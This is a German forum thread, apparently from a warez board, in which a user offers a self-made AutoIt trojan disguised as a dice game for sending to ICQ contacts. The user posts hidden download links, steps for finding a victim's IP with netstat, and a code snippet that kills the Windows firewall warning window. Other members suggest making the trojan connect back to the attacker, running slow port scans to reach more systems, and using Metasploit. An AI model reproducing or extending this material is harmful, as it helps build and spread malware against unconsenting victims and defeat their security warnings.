![]() |
Mini Trojaner
Ist es Verboten hier eigene Mini Trojaner o.ä. reinzustellen? Ich will nicht gleich gebannt werden :confused:
Es ist kein gefährlicher, sonder einfach so ein "ICQ-gag". Schnell versenden, IP rauskriegen (mit ICQ total leicht) und Bildschirm An/Aus machen und so... Also darf ich oder nich? Downloadlink zweite Seite!!! mfg Answer :T |
Selber wissen tu ich es nicht aber.. hier tuen tausende ihre downloads rein mit trojanern etc. xD
|
Ist soweit Ok ... aber bitte virenfrei ...
virustotal.com link bitte dazu posten ... |
Zitat:
|
Ich meine halt, das im Trojaner nicht noch 2 andere Trojaner versteckt sind .. :D
Ich hoffe, du verstehst :D |
Auch ein mit Viren befallendes Tool kann man FUD machen, von daher ist virustotal überflüssig ;).
|
Zitat:
|
Zitat:
Wir sind ein Warez Board und kein Hack/Viren/Trojaner Board!!! |
Zitat:
|
Is überhaupt nix gefährliches!!!!
Hier die links zum Download: client: [Link nur für registrierte und freigeschaltete Mitglieder sichtbar. Jetzt registrieren...] server: [Link nur für registrierte und freigeschaltete Mitglieder sichtbar. Jetzt registrieren...] ACHTUNG!!!! Is getarnt als Würfelspiel^^ Quellcode Server (AutoIt): Client: |
Das ausgerechnet Du jetzt rumwunderst .... :eek:
|
Und was kann der alles wenn mir der Quell Text mal nichts sagt bzw. ich mich damit net aus kenne :o Jetzt kommt mir aber nicht das ich es dann sein lassen kann. Ich frage ja nur und jeder fängt mal an sich in neue Gebiete zu begeben :confused:
|
hey^^ kannst das auch für Windows 7 lauffähig machen? mit kompatibilität läuft da leida nix.... ^^
|
Zitat:
|
Vielleicht könnte sich auch mal jemand aufs Thema konzentrieren???
Hab nämlich schon fehler festgestellt. Beim ersten start wird doch die datei nach C:\Programme\winserver.exe geschoben. Wenn man die Datei öffnen will kommt ein Error. ka warum. Ich teste mal weiter und wir werden sehen Anleitung zum IP rauskriegen bei ICQ: Wenn die datei über ICQ versendet und gestartet worden ist folgendes tun. - CMD starten (Start Ausführen CMD <Enter>; Start suche eingeben CMD <Enter>) - "netstat" eingeben und warten bis es geladen hat - Die IP mit :5190 (ICQ port) suchen und in den Client oben reinschreiben (ohne :5190) @austrianidi0t is unter Win7 gemacht worden. Dass am anfang der Desktop + Taskleiste verschwindet soll so sein. Und die ganzen Fehlermeldungen sind beabsichtigt!!!! LOL jetzt hab ich noch Anti-Firewall hinzugefügt. wenn das Firewallfenster kommt, wird es einfach "gekillt". sieht so aus: $count = 0 While 1 If WinExists("Windows-Sicherheitsmeldung","") Then WinKill("Windows-Sicherheitsmeldung") If $count = 20000 Then Exitloop sleep(1) $count = $count + 1 WEnd |
warum horcht dein client?
|
Was macht der? horcht? wasn das?
|
na dein client muss doch auf irgend nem port horchen ob ne verbindung ansteht? Ansonsten würde die Firewallmeldung doch garnet kommen
|
Aso,
Port: 5110 Ein übliches Trojanerport, weil kein häufig benutztes Programm drüberläuft. |
aber warum macht der das? das is doch totaler schwachsinn, wenn da nen NAT router davor hängt kannst du dich doch garnich zu dem hin verbinden.
|
Zitat:
Zitat:
Hab grad garkeine ahnung was du meinst. Zumindest innerhalb von Netzwerken klappt es. (mehr brauch man in der Schule auch nicht, wenn man den Lehrer ärgern möchte) |
also wenn du nur in netzwerken arbeitest dann is das so in ordnung. wenn du aber im Internet agierst müsste dein Opfer erst den Port 5110 in seinem Router freigeben, wird wohl kaum einer machen. Besser wäre es wenn dein Server auf dem Port horcht, sprich verbindungen erwartet. Wenn du jemanden deinen Trojanerclient sendest baut der dann eine Verbindung zu dir auf.
1. Windows Firewall meldet sich nicht (Allerdings reagieren PFWs auch auf das) 2. Nur du musst den Port freigeben. Aber wie gesagt in nem Intranet is es egal. |
Also der Connected zu mir.....hab darüber noch garnicht nachgedacht. clever^^
THX werd mich mal damit beschäftigen. Aber Heut nimmer. |
effektiver ist es beim clienten einen sehr langsamen portscan auszuführen. So ist es einfacher den Trojaner an mehrere Systeme anzukoppeln.
|
Könnt ihr mir beibringen wie so etwas funktioniert?
Ich hatte mal einen Trojaner, der lief auch, wurde aber nach ner Zeit langweilich weil zu wenig Opfer um ärgern da waren.. Mir hat das jemand mit Bifrost gemacht, Trojaner erstellt und ich habs halt verschickt oder über no-ip seine opfer gesehen... Aber wie das mit Bifrost funktioniert.. keine ahnung^^ |
lass die billig-s***** kiddy programe. Metasploit Framework mit Exploits sind effektiver. Nmap ist auch sehr wichtig. Wenn du das kannst, dann wirst du Spass haben!!
|
| Alle Zeitangaben in WEZ +1. Es ist jetzt 17:07 Uhr. |
Powered by vBulletin® (Deutsch)
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.